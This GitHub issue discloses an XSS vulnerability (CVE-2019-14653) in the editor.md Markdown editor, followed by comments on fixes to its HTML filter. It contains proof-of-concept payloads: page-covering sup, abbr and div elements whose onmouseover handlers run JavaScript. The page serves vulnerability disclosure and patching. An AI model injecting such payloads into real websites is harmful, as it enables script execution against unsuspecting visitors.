Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XSS vulnerability on <abbr> and <sup>. #715

Open
Ry0taK opened this issue Aug 2, 2019 · 7 comments
Open

XSS vulnerability on <abbr> and <sup>. #715

Ry0taK opened this issue Aug 2, 2019 · 7 comments

Comments

@Ry0taK
Copy link

Ry0taK commented Aug 2, 2019
edited
Loading

Summary

Because there are no attribute filters in the abbr andsup tags, an attacker can trigger XSS on websites which is using editor.md.

CVE

CVE-2019-14653

Payloads

This will execute JavaScript when you move the mouse on any part of the page.

<sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('sup')">sup</sup>
<abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('abbr')">abbr</abbr>

Images

screenshot
@BedRemka
Copy link

sup
abbr

@huntr-helper
Copy link

👋 Hey! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!

alromh87 added a commit to alromh87/editor.md that referenced this issue Mar 25, 2020
@alromh87
Document usage of htmlDecode to avoid XSS Fixes pandao#715
9c09a8f
@alromh87
Copy link

alromh87 commented Mar 25, 2020
edited
Loading

Hello while bug bounting this issue, I noticed the filter is implemented, you should use

htmlDecode : "|on*"

while starting editor, this should be preferred method, that way it protects against code injection in all elements, like divs, img, ...., not just abbr & sup

XSS can also be achived with many more elements:

<div style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('div')">div</div>

sent PR updating README to make it clear

@alromh87 alromh87 mentioned this issue Mar 27, 2020
Merged
alromh87 added a commit to alromh87/editor.md that referenced this issue Mar 27, 2020
@alromh87
Fix pandao#715
0c6cdde 
Disable script and on events by default to avoid XSS.

User can enable by setting allowScript|allowOn

Readme updated
@fluix-dev
Copy link

Is there anything else that needs to be done? The PR seems to have been merged.

@alromh87
Copy link

I think this can be closed

@alromh87
Copy link

After looking deeper I realized filter is inefective for self clossing tags, will look into it

@alromh87 alromh87 mentioned this issue Sep 10, 2020
Merged
@alromh87
Copy link

Should work properly now

alromh87 added a commit to alromh87/editor.md that referenced this issue Sep 10, 2020
@alromh87
Improve RegExp filter
f5cb82c 
fixes #pandao#612
fixes #pandao#662
fixes #pandao#697
fixes #pandao#700
fixes #pandao#701
fixes #pandao#709
fixes #pandao#715
fixes #pandao#764
fixes #pandao#816

### Probably:
fixes #pandao#307
fixes #pandao#560
alromh87 added a commit to alromh87/editor.md that referenced this issue Sep 10, 2020
@alromh87
Improve RegExp filter
067619e 
fixes #pandao#612
fixes #pandao#662
fixes #pandao#697
fixes #pandao#700
fixes #pandao#701
fixes #pandao#709
fixes #pandao#715
fixes #pandao#764
fixes #pandao#816

fixes #pandao#307
fixes #pandao#560
@huntr-helper huntr-helper mentioned this issue Sep 22, 2020
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@alromh87 @Ry0taK @BedRemka @fluix-dev @huntr-helper